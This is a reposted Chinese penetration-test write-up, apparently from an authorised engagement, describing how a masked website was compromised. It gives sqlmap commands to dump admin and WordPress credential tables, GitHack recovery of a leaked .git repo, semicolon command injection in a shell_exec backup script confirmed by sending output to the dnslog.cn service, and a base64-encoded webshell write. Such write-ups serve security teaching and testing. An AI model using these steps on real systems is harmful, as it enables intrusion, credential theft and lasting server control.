项目实战 | SQL注入的“格局”

Posted 黑白之道

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了项目实战 | SQL注入的“格局”相关的知识,希望对你有一定的参考价值。


文章来源:安译Sec

0x00 前言


曾经搞站最经典的套路就是:注入拿到密码进后台,上传shell然后内核提权。但是实际环境中,往往会有注入后密码解不开、找不到后台等情况,所以现在有的师傅说sql注入还不如xss。


0x01 详细步骤


一.网站界面就不放了,打码太累了,直接跳到随意点点后发现可疑参数,并确定存在漏洞的截图。


and 1=1页面显示正常,and 1=0页面变空白确定存在数字型注入,order by确定共4列,最后用select 1,2,3,4确定第2列回显。


项目实战 | SQL注入的“格局”


二.之前探测发现没有waf,那就直接sqlmap一把梭。


跑当前库名:python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent --current-db跑所有数据库名:python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent --dbs标绿色的为当前数据库:xxx_history


项目实战 | SQL注入的“格局”

三. 跑当前数据库表名。


python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent -D xxx_history --table


标绿色的表为我认为是存放管理员数据的表:


项目实战 | SQL注入的“格局”


四.直接拖管理表的数据。


python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent -D xxx_history -T administrators --dump


项目实战 | SQL注入的“格局”


居然是明文密码,现在明文密码很少见了,不过考虑到目标网站有点历史悠久,也能理解。


五.虽然获得了管理员密码,但是找不到后台,常用的/admin、/login、/manage都试了。


项目实战 | SQL注入的“格局”


六.用脚本扫目录,字典用的是御剑的标准字典。得到以下敏感目录(截图不全)。


项目实战 | SQL注入的“格局”


七.git目录存在即git源码泄露漏洞,用GitHack脚本恢复了整站源码,一大坨,截图就不放了,放个数字你们感受下。


python2 GitHack.py https://www.马赛克.com/.git/


项目实战 | SQL注入的“格局”


八.根据名字确定其中疑似后台的目录:


项目实战 | SQL注入的“格局”


九.访问试试,/admin1已经404了,因为git中留存的是历史代码,所以目录被改名或删除都有可能。


项目实战 | SQL注入的“格局”


十./7mysql7需要输入密码,试了不是之前注出的密码。


项目实战 | SQL注入的“格局”


十一.xxxquestions目录下的wp-admin倒是可以进,但是也不是之前注出的密码。


项目实战 | SQL注入的“格局”


十二.之前看到还有个xxx_questions数据库,再用sqlmap去跑一下试试:


python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent -D xxx_questions --tables


项目实战 | SQL注入的“格局”

python2 sqlmap.py -u https://www.马赛克.com/subcat.php?id=24 --random-agent -D xxx_questions -T wp_users --dump


项目实战 | SQL注入的“格局”


十三.这种加密是wordpress特有的加密,cmd5有针对该框架的解密,但是这个密码似乎太复杂,解不出。


项目实战 | SQL注入的“格局”


十四.至此sql注入后有密码找不到后台、有后台解不开密码的情况就都碰到了。渗透似乎陷入僵局,没关系,手里的源码还有利用价值,拖到D盾里自动审计一下。


项目实战 | SQL注入的“格局”


十五.访问那个级别5的已知后门,原来已经被人日过了,是个黑页:hacked by XXX。这个网站比较有历史了,可能这个黑页也是很多年前的某个娱乐圈黑客搞的。


项目实战 | SQL注入的“格局”


十六.访问级别4的shell_exec后门,是个空白页面,查看手中的源代码,发现是一个备份脚本,有可能是同行留的,也有可能是没有安全意识的管理员自己写的。后面那种可能性比较大。


项目实战 | SQL注入的“格局”


十七.脚本逻辑:接收了POST的filename参数,然后执行打包备份,但是参数传进shell_exec之前没有做过滤,产生了命令执行的漏洞。用linux的命令连接符分号,可以在后面拼接任意命令,这里尝试一下执行whoami,但是还是空白页面。


项目实战 | SQL注入的“格局”


十八.想到是因为shell_exec函数没有回显,也不知道命令执行成功没有,这里我们用公开免费的dnslog平台去接收没有回显的注入:


http://www.dnslog.cn/,用法如下:


先点击Get SubDomain在平台获取一个域名


项目实战 | SQL注入的“格局”



十九.然后执行ping命令,反撇号中的命令会自动执行并返回命令执行的结果拼接到命令里,linux系统使用ping命令要加-c指定次数,不然会一直ping个没完。


项目实战 | SQL注入的“格局”


二十.去平台点击Refresh Record刷新(不要刷新整个网页),获取到解析日志。


项目实战 | SQL注入的“格局”


可以看到命令是执行成功了的。whoami的回显为www-data

 

二十一.确认了漏洞存在,接下来利用漏洞写一句话,注意因为一句话中包含特殊字符,要编码后写入,payload如下


echo base64编码后的一句话|base64 -d > shell.php


(实战中不要用这个文件名,有授权的测试随便,但要注意文件名对waf来说也是一种特征)


项目实战 | SQL注入的“格局”


二十二.写马成功


项目实战 | SQL注入的“格局”


二十三.客户没有授权内网,项目结束。


项目实战 | SQL注入的“格局”

项目实战 | SQL注入的“格局”


推荐文章++++

项目实战 | SQL注入的“格局”

*

*

*


以上是关于项目实战 | SQL注入的“格局”的主要内容,如果未能解决你的问题,请参考以下文章

实战某项目SQL注入引发的思考

项目实战 | 报错SQL注入绕过WAF

实战 | 代码审计中的SQL注入和预编译中的SQL注入

安全测试 web安全测试 常规安全漏洞 可能存在SQL和JS注入漏洞场景分析。为什么自己没有找到漏洞,哪么可能存在漏洞场景是?SQL注入漏洞修复 JS注入漏洞修复 漏洞存在场景分析和修复示例(代码片段

可怕的漏洞,SQL注入漏洞实战演习

Spring Cloud微服务安全实战_3-2_第一个API及注入攻击防护